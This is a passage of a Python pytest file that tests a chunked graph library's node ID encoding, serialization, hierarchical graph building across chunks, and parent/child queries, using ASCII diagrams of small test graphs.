create_chunk(graph,
vertices=[to_label(graph, 1, 1, 0, 0, 0), to_label(graph, 1, 1, 0, 0, 1)],
edges=[(to_label(graph, 1, 1, 0, 0, 0), to_label(graph, 1, 1, 0, 0, 1), 0.5),
(to_label(graph, 1, 1, 0, 0, 0), to_label(graph, 1, 2, 0, 0, 0), inf)])
# Chunk C
create_chunk(graph,
vertices=[to_label(graph, 1, 2, 0, 0, 0)],
edges=[(to_label(graph, 1, 2, 0, 0, 0), to_label(graph, 1, 1, 0, 0, 0), inf)])
graph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]))
graph.add_layer(3, np.array([[2, 0, 0]]))
graph.add_layer(4, np.array([[0, 0, 0], [1, 0, 0]]))
return graph
def create_chunk(cgraph, vertices=None, edges=None, timestamp=None):
"""
Helper function to add vertices and edges to the chunkedgraph - no safety checks!
"""
if not vertices:
vertices = []
if not edges:
edges = []
vertices = np.unique(np.array(vertices, dtype=np.uint64))
edges = [(np.uint64(v1), np.uint64(v2), np.float32(aff)) for v1, v2, aff in edges]
isolated_node_ids = [x for x in vertices if (x not in [edges[i][0] for i in range(len(edges))]) and
(x not in [edges[i][1] for i in range(len(edges))])]
edge_ids = {"in_connected": np.array([], dtype=np.uint64).reshape(0, 2),
"in_disconnected": np.array([], dtype=np.uint64).reshape(0, 2),
"cross": np.array([], dtype=np.uint64).reshape(0, 2),
"between_connected": np.array([], dtype=np.uint64).reshape(0, 2),
"between_disconnected": np.array([], dtype=np.uint64).reshape(0, 2)}
edge_affs = {"in_connected": np.array([], dtype=np.float32),
"in_disconnected": np.array([], dtype=np.float32),
"between_connected": np.array([], dtype=np.float32),
"between_disconnected": np.array([], dtype=np.float32)}
for e in edges:
if cgraph.test_if_nodes_are_in_same_chunk(e[0:2]):
this_edge = np.array([e[0], e[1]], dtype=np.uint64).reshape(-1, 2)
edge_ids["in_connected"] = \
np.concatenate([edge_ids["in_connected"], this_edge])
edge_affs["in_connected"] = \
np.concatenate([edge_affs["in_connected"], [e[2]]])
if len(edge_ids["in_connected"]) > 0:
chunk_id = cgraph.get_chunk_id(edge_ids["in_connected"][0][0])
elif len(vertices) > 0:
chunk_id = cgraph.get_chunk_id(vertices[0])
else:
chunk_id = None
for e in edges:
if not cgraph.test_if_nodes_are_in_same_chunk(e[0:2]):
# Ensure proper order
if chunk_id is not None:
if cgraph.get_chunk_id(e[0]) != chunk_id:
e = [e[1], e[0], e[2]]
this_edge = np.array([e[0], e[1]], dtype=np.uint64).reshape(-1, 2)
if np.isinf(e[2]):
edge_ids["cross"] = \
np.concatenate([edge_ids["cross"], this_edge])
else:
edge_ids["between_connected"] = \
np.concatenate([edge_ids["between_connected"],
this_edge])
edge_affs["between_connected"] = \
np.concatenate([edge_affs["between_connected"], [e[2]]])
isolated_node_ids = np.array(isolated_node_ids, dtype=np.uint64)
cgraph.logger.debug(edge_ids)
cgraph.logger.debug(edge_affs)
# Use affinities as areas
cgraph.add_atomic_edges_in_chunks(edge_ids, edge_affs, edge_affs,
isolated_node_ids,
time_stamp=timestamp)
def to_label(cgraph, l, x, y, z, segment_id):
return cgraph.get_node_id(np.uint64(segment_id), layer=l, x=x, y=y, z=z)
class TestGraphNodeConversion:
@pytest.mark.timeout(30)
def test_compute_bitmasks(self):
pass
@pytest.mark.timeout(30)
def test_node_conversion(self, gen_graph):
cgraph = gen_graph(n_layers=10)
node_id = cgraph.get_node_id(np.uint64(4), layer=2, x=3, y=1, z=0)
assert cgraph.get_chunk_layer(node_id) == 2
assert np.all(cgraph.get_chunk_coordinates(node_id) == np.array([3, 1, 0]))
chunk_id = cgraph.get_chunk_id(layer=2, x=3, y=1, z=0)
assert cgraph.get_chunk_layer(chunk_id) == 2
assert np.all(cgraph.get_chunk_coordinates(chunk_id) == np.array([3, 1, 0]))
assert cgraph.get_chunk_id(node_id=node_id) == chunk_id
assert cgraph.get_node_id(np.uint64(4), chunk_id=chunk_id) == node_id
@pytest.mark.timeout(30)
def test_node_id_adjacency(self, gen_graph):
cgraph = gen_graph(n_layers=10)
assert cgraph.get_node_id(np.uint64(0), layer=2, x=3, y=1, z=0) + np.uint64(1) == \
cgraph.get_node_id(np.uint64(1), layer=2, x=3, y=1, z=0)
assert cgraph.get_node_id(np.uint64(2**53 - 2), layer=10, x=0, y=0, z=0) + np.uint64(1) == \
cgraph.get_node_id(np.uint64(2**53 - 1), layer=10, x=0, y=0, z=0)
@pytest.mark.timeout(30)
def test_serialize_node_id(self, gen_graph):
cgraph = gen_graph(n_layers=10)
assert serializers.serialize_uint64(cgraph.get_node_id(np.uint64(0), layer=2, x=3, y=1, z=0)) < \
serializers.serialize_uint64(cgraph.get_node_id(np.uint64(1), layer=2, x=3, y=1, z=0))
assert serializers.serialize_uint64(cgraph.get_node_id(np.uint64(2 ** 53 - 2), layer=10, x=0, y=0, z=0)) < \
serializers.serialize_uint64(cgraph.get_node_id(np.uint64(2 ** 53 - 1), layer=10, x=0, y=0, z=0))
@pytest.mark.timeout(30)
def test_deserialize_node_id(self):
pass
@pytest.mark.timeout(30)
def test_serialization_roundtrip(self):
pass
@pytest.mark.timeout(30)
def test_serialize_valid_label_id(self):
label = np.uint64(0x01FF031234556789)
assert serializers.deserialize_uint64(
serializers.serialize_uint64(label)) == label
class TestGraphBuild:
@pytest.mark.timeout(30)
def test_build_single_node(self, gen_graph):
"""
Create graph with single RG node 1 in chunk A
┌─────┐
│ A¹ │
│ 1 │
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=2)
# Add Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)])
res = cgraph.table.read_rows()
res.consume_all()
# Check for the RG-to-CG mapping:
# assert chunkedgraph.serialize_uint64(1) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(1)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 0)
# Check for the Level 1 CG supervoxel:
# to_label(cgraph, 1, 0, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 0
assert len(atomic_affinities) == 0
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# Check for the one Level 2 node that should have been created.
# to_label(cgraph, 2, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
for aces in atomic_cross_edge_dict.values():
assert len(aces) == 0
assert len(children) == 1 and children[0] == to_label(cgraph, 1, 0, 0, 0, 0)
# Make sure there are not any more entries in the table
assert len(res.rows) == 1 + 1 + 1 + 1
@pytest.mark.timeout(30)
def test_build_single_edge(self, gen_graph):
"""
Create graph with edge between RG supervoxels 1 and 2 (same chunk)
┌─────┐
│ A¹ │
│ 1━2 │
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=2)
# Add Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5)])
res = cgraph.table.read_rows()
res.consume_all()
# Check for the two RG-to-CG mappings:
# assert chunkedgraph.serialize_uint64(1) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(1)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 0)
# assert chunkedgraph.serialize_uint64(2) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(2)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 1)
# Check for the two original Level 1 CG supervoxels
# to_label(cgraph, 1, 0, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == 0.5
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# to_label(cgraph, 1, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 1)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 1))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == 0.5
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# Check for the one Level 2 node that should have been created.
assert serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
for aces in atomic_cross_edge_dict.values():
assert len(aces) == 0
assert len(children) == 2 and to_label(cgraph, 1, 0, 0, 0, 0) in children and to_label(cgraph, 1, 0, 0, 0, 1) in children
# Make sure there are not any more entries in the table
assert len(res.rows) == 2 + 1 + 1 + 1
@pytest.mark.timeout(30)
def test_build_single_across_edge(self, gen_graph):
"""
Create graph with edge between RG supervoxels 1 and 2 (neighboring chunks)
┌─────┌─────┐
│ A¹ │ B¹ │
│ 1━━┿━━2 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf)])
# Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]))
res = cgraph.table.read_rows()
res.consume_all()
# Check for the two RG-to-CG mappings:
# assert chunkedgraph.serialize_uint64(1) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(1)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 0)
# assert chunkedgraph.serialize_uint64(2) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(2)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 1, 0, 0, 0)
# Check for the two original Level 1 CG supervoxels
# to_label(cgraph, 1, 0, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
cgraph.logger.debug(atomic_node_info.keys())
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 1, 0, 0, 0)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == inf
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# to_label(cgraph, 1, 1, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 1, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 1, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == inf
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 1, 0, 0, 1)
# Check for the two Level 2 nodes that should have been created. Since Level 2 has the same
# dimensions as Level 1, we also expect them to be in different chunks
# to_label(cgraph, 2, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
test_ace = np.array([to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0)], dtype=np.uint64)
assert len(atomic_cross_edge_dict[2]) == 1
assert test_ace in atomic_cross_edge_dict[2]
assert len(children) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in children
# to_label(cgraph, 2, 1, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 2, 1, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 1, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 1, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
test_ace = np.array([to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)], dtype=np.uint64)
assert len(atomic_cross_edge_dict[2]) == 1
assert test_ace in atomic_cross_edge_dict[2]
assert len(children) == 1 and to_label(cgraph, 1, 1, 0, 0, 0) in children
# Check for the one Level 3 node that should have been created. This one combines the two
# connected components of Level 2
# to_label(cgraph, 3, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 3, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 3, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 3, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
for aces in atomic_cross_edge_dict.values():
assert len(aces) == 0
assert len(children) == 2 and to_label(cgraph, 2, 0, 0, 0, 1) in children and to_label(cgraph, 2, 1, 0, 0, 1) in children
# Make sure there are not any more entries in the table
assert len(res.rows) == 2 + 2 + 1 + 3 + 1
@pytest.mark.timeout(30)
def test_build_single_edge_and_single_across_edge(self, gen_graph):
"""
Create graph with edge between RG supervoxels 1 and 2 (same chunk)
and edge between RG supervoxels 1 and 3 (neighboring chunks)
┌─────┬─────┐
│ A¹ │ B¹ │
│ 2━1━┿━━3 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf)])
# Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]))
res = cgraph.table.read_rows()
res.consume_all()
# Check for the three RG-to-CG mappings:
# assert chunkedgraph.serialize_uint64(1) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(1)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 0)
# assert chunkedgraph.serialize_uint64(2) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(2)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 1)
# assert chunkedgraph.serialize_uint64(3) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(3)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 1, 0, 0, 0)
# Check for the three original Level 1 CG supervoxels
# to_label(cgraph, 1, 0, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 2 and to_label(cgraph, 1, 0, 0, 0, 1) in atomic_partners and to_label(cgraph, 1, 1, 0, 0, 0) in atomic_partners
assert len(atomic_affinities) == 2
if atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 1):
assert atomic_affinities[0] == 0.5 and atomic_affinities[1] == inf
else:
assert atomic_affinities[0] == inf and atomic_affinities[1] == 0.5
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# to_label(cgraph, 1, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 1)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 1))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == 0.5
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# to_label(cgraph, 1, 1, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 1, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 1, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == inf
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 1, 0, 0, 1)
# Check for the two Level 2 nodes that should have been created. Since Level 2 has the same
# dimensions as Level 1, we also expect them to be in different chunks
# to_label(cgraph, 2, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
test_ace = np.array([to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0)], dtype=np.uint64)
assert len(atomic_cross_edge_dict[2]) == 1
assert test_ace in atomic_cross_edge_dict[2]
assert len(children) == 2 and to_label(cgraph, 1, 0, 0, 0, 0) in children and to_label(cgraph, 1, 0, 0, 0, 1) in children
# to_label(cgraph, 2, 1, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 2, 1, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 1, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 1, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
test_ace = np.array([to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)], dtype=np.uint64)
assert len(atomic_cross_edge_dict[2]) == 1
assert test_ace in atomic_cross_edge_dict[2]
assert len(children) == 1 and to_label(cgraph, 1, 1, 0, 0, 0) in children
# Check for the one Level 3 node that should have been created. This one combines the two
# connected components of Level 2
# to_label(cgraph, 3, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 3, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 3, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 3, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
for ace in atomic_cross_edge_dict.values():
assert len(ace) == 0
assert len(children) == 2 and to_label(cgraph, 2, 0, 0, 0, 1) in children and to_label(cgraph, 2, 1, 0, 0, 1) in children
# Make sure there are not any more entries in the table
assert len(res.rows) == 3 + 2 + 1 + 3 + 1
@pytest.mark.timeout(30)
def test_build_big_graph(self, gen_graph):
"""
Create graph with RG nodes 1 and 2 in opposite corners of the largest possible dataset
┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │
│ 1 │ │ 2 │
│ │ │ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=10)
# Preparation: Build Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[])
# Preparation: Build Chunk Z
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 255, 255, 255, 0)],
edges=[])
cgraph.add_layer(3, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(3, np.array([[0xFF, 0xFF, 0xFF]]))
cgraph.add_layer(4, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(4, np.array([[0x7F, 0x7F, 0x7F]]))
cgraph.add_layer(5, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(5, np.array([[0x3F, 0x3F, 0x3F]]))
cgraph.add_layer(6, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(6, np.array([[0x1F, 0x1F, 0x1F]]))
cgraph.add_layer(7, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(7, np.array([[0x0F, 0x0F, 0x0F]]))
cgraph.add_layer(8, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(8, np.array([[0x07, 0x07, 0x07]]))
cgraph.add_layer(9, np.array([[0x00, 0x00, 0x00]]))
cgraph.add_layer(9, np.array([[0x03, 0x03, 0x03]]))
cgraph.add_layer(10, np.array([[0x00, 0x00, 0x00], [0x01, 0x01, 0x01]]))
res = cgraph.table.read_rows()
res.consume_all()
# cgraph.logger.debug(len(res.rows))
# for row_key in res.rows.keys():
# cgraph.logger.debug(row_key)
# cgraph.logger.debug(cgraph.get_chunk_layer(chunkedgraph.deserialize_uint64(row_key)))
# cgraph.logger.debug(cgraph.get_chunk_coordinates(chunkedgraph.deserialize_uint64(row_key)))
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 0)) in res.rows
assert serializers.serialize_uint64(to_label(cgraph, 1, 255, 255, 255, 0)) in res.rows
assert serializers.serialize_uint64(to_label(cgraph, 10, 0, 0, 0, 1)) in res.rows
assert serializers.serialize_uint64(to_label(cgraph, 10, 0, 0, 0, 2)) in res.rows
@pytest.mark.timeout(30)
def test_double_chunk_creation(self, gen_graph):
"""
No connection between 1, 2 and 3
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 3 │
│ 2 │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=4)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0, 0, 0]]),
time_stamp=fake_timestamp)
assert len(cgraph.range_read_chunk(layer=3, x=0, y=0, z=0)) == 6
assert len(cgraph.range_read_chunk(layer=4, x=0, y=0, z=0)) == 3
assert cgraph.get_chunk_layer(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))) == 4
assert cgraph.get_chunk_layer(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 2))) == 4
assert cgraph.get_chunk_layer(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1))) == 4
lvl_3_child_ids = [cgraph.get_segment_id(cgraph.read_node_id_row(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)), column_keys.Hierarchy.Child)[0].value),
cgraph.get_segment_id(cgraph.read_node_id_row(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 2)), column_keys.Hierarchy.Child)[0].value),
cgraph.get_segment_id(cgraph.read_node_id_row(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1)), column_keys.Hierarchy.Child)[0].value)]
assert 4 in lvl_3_child_ids
assert 5 in lvl_3_child_ids
assert 6 in lvl_3_child_ids
class TestGraphSimpleQueries:
"""
┌─────┬─────┬─────┐ L X Y Z S L X Y Z S L X Y Z S L X Y Z S
│ A¹ │ B¹ │ C¹ │ 1: 1 0 0 0 0 ─── 2 0 0 0 1 ─── 3 0 0 0 1 ─── 4 0 0 0 1
│ 1 │ 3━2━┿━━4 │ 2: 1 1 0 0 0 ─┬─ 2 1 0 0 1 ─── 3 0 0 0 2 ─┬─ 4 0 0 0 2
│ │ │ │ 3: 1 1 0 0 1 ─┘ │
└─────┴─────┴─────┘ 4: 1 2 0 0 0 ─── 2 2 0 0 1 ─── 3 1 0 0 1 ─┘
"""
@pytest.mark.timeout(30)
def test_get_parent_and_children(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
children10000 = cgraph.get_children(to_label(cgraph, 1, 0, 0, 0, 0))
children11000 = cgraph.get_children(to_label(cgraph, 1, 1, 0, 0, 0))
children11001 = cgraph.get_children(to_label(cgraph, 1, 1, 0, 0, 1))
children12000 = cgraph.get_children(to_label(cgraph, 1, 2, 0, 0, 0))
parent10000 = cgraph.get_parent(to_label(cgraph, 1, 0, 0, 0, 0), get_only_relevant_parent=True, time_stamp=None)
parent11000 = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0), get_only_relevant_parent=True, time_stamp=None)
parent11001 = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
parent12000 = cgraph.get_parent(to_label(cgraph, 1, 2, 0, 0, 0), get_only_relevant_parent=True, time_stamp=None)
children20001 = cgraph.get_children(to_label(cgraph, 2, 0, 0, 0, 1))
children21001 = cgraph.get_children(to_label(cgraph, 2, 1, 0, 0, 1))
children22001 = cgraph.get_children(to_label(cgraph, 2, 2, 0, 0, 1))
parent20001 = cgraph.get_parent(to_label(cgraph, 2, 0, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
parent21001 = cgraph.get_parent(to_label(cgraph, 2, 1, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
parent22001 = cgraph.get_parent(to_label(cgraph, 2, 2, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
children30001 = cgraph.get_children(to_label(cgraph, 3, 0, 0, 0, 1))
children30002 = cgraph.get_children(to_label(cgraph, 3, 0, 0, 0, 2))
children31001 = cgraph.get_children(to_label(cgraph, 3, 1, 0, 0, 1))
parent30001 = cgraph.get_parent(to_label(cgraph, 3, 0, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
parent30002 = cgraph.get_parent(to_label(cgraph, 3, 0, 0, 0, 2), get_only_relevant_parent=True, time_stamp=None)
parent31001 = cgraph.get_parent(to_label(cgraph, 3, 1, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
children40001 = cgraph.get_children(to_label(cgraph, 4, 0, 0, 0, 1))
children40002 = cgraph.get_children(to_label(cgraph, 4, 0, 0, 0, 2))
parent40001 = cgraph.get_parent(to_label(cgraph, 4, 0, 0, 0, 1), get_only_relevant_parent=True, time_stamp=None)
parent40002 = cgraph.get_parent(to_label(cgraph, 4, 0, 0, 0, 2), get_only_relevant_parent=True, time_stamp=None)
